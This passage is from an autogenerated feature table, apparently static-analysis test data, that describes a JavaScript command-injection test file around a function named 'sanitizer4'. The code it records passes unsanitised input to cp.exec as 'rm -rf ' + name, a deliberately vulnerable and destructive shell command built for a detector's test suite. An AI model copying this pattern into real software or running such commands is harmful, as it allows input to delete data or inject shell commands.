isNaN(p ... e, 10)) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | isNaN(p ... e, 10)) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | isNaN(p ... e, 10)) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:6:530:30 | isNaN(p ... e, 10)) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:19 | parseInt | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:19 | parseInt | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:19 | parseInt | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:19 | parseInt | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:19 | parseInt | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:29 | exceptional return of parseInt(name, 10) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:29 | exceptional return of parseInt(name, 10) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:29 | exceptional return of parseInt(name, 10) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:29 | exceptional return of parseInt(name, 10) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:12:530:29 | exceptional return of parseInt(name, 10) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:21:530:24 | name | CalleeFlexibleAccessPath | parseInt | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:21:530:24 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:21:530:24 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:21:530:24 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:21:530:24 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:21:530:24 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:21:530:24 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:27:530:28 | 10 | CalleeFlexibleAccessPath | parseInt | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:27:530:28 | 10 | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:27:530:28 | 10 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:27:530:28 | 10 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:27:530:28 | 10 | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:27:530:28 | 10 | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:530:27:530:28 | 10 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:3:531:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:6:531:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:6:531:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:6:531:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:6:531:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:6:531:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:11:531:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:23:531:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:23:531:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:23:531:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:23:531:26 | name | enclosingFunctionName | sanitizer4 | +| 